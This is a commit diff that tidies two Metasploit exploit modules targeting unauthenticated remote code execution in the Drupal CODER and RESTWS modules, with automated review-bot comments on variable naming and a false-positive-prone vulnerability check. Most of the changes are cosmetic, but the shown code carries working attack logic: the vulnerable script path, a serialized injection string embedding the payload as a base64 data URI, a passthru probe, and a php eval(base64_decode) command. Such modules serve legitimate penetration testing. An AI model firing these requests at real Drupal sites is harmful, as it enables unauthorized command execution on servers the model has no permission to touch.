Clean up Mehmet modules
parent
b4846e5793
commit
62d28f10cb
|
@ -12,16 +12,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Drupal CODER Module Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a Remote Command Execution vulnerability in
|
||||
Drupal CODER Module. Unauthenticated users can execute arbitrary command
|
||||
under the context of the web server user.
|
||||
This module exploits a Remote Command Execution vulnerability in the
|
||||
Drupal CODER Module. Unauthenticated users can execute arbitrary
|
||||
commands under the context of the web server user.
|
||||
|
||||
CODER module doesn't sufficiently validate user inputs in a script file
|
||||
that has the php extension. A malicious unauthenticated user can make
|
||||
requests directly to this file to execute arbitrary command.
|
||||
The module does not need to be enabled for this to be exploited
|
||||
The CODER module doesn't sufficiently validate user inputs in a script
|
||||
file that has the PHP extension. A malicious unauthenticated user can
|
||||
make requests directly to this file to execute arbitrary commands.
|
||||
The module does not need to be enabled for this to be exploited.
|
||||
|
||||
This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
|
||||
This module was tested against CODER 2.5 with Drupal 7.5 installed on
|
||||
Ubuntu Server.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -64,6 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
|
||||
)
|
||||
|
||||
if res && res.body.include?('file parameter is not setNo path to parameter file')
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
|
@ -84,7 +86,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
p << ':"-v;'
|
||||
p << payload.encoded
|
||||
p << ' #";s:4:"name";s:4:"test";}}}'
|
||||
|
||||
payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
|
||||
|
||||
send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
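Review bot: In the last hunk of this file, `payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"` assigns a local named `payload` two lines after `p << payload.encoded` read the module's payload object, so the same name means two different things within a few lines. Renaming the local, for example `data_uri = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"`, keeps the framework accessor unshadowed. Any later use of the string in the request parameters would need the same rename. The buffer `p` also hides `Kernel#p` and would read better with a descriptive name. The method starts and ends outside the hunk, so the remaining uses are not visible here.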
|
||||
|
|
|
@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Drupal RESTWS Module Remote PHP Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a Remote PHP Code Execution vulnerability in
|
||||
This module exploits a Remote PHP Code Execution vulnerability in the
|
||||
Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
|
||||
under the context of the web server user.
|
||||
|
||||
|
@ -20,9 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
additional functionality. A vulnerability in this approach allows
|
||||
an unauthenticated attacker to send specially crafted requests resulting
|
||||
in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7
|
||||
versions are affected by issue.
|
||||
are affected by this issue.
|
||||
|
||||
This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.
|
||||
This module was tested against RESTWS 2.5 with Drupal 7.5 installed on
|
||||
Ubuntu Server.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -55,6 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
r = rand_text_alpha(8 + rand(4))
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
@ -62,6 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'q' => "taxonomy_vocabulary//passthru/echo #{r}"
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.body.include?(r)
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
|
@ -71,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
|
||||
|
||||
send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
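Review bot: `if res && res.body.include?(r)` in `check` returns `Exploit::CheckCode::Vulnerable` whenever the random token appears anywhere in the body, yet the same token is sent in the `q` parameter. A site that merely reflects the requested path, for instance in an error page, would presumably be reported as vulnerable too, which produces false positives in an assessment report. The limitation should at least be documented above the condition with a comment such as `# NOTE: a response that only reflects the q value also matches; confirm before reporting`. The `check` body is split across two hunks and its `else` branch is outside the visible lines.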
|
||||
|
|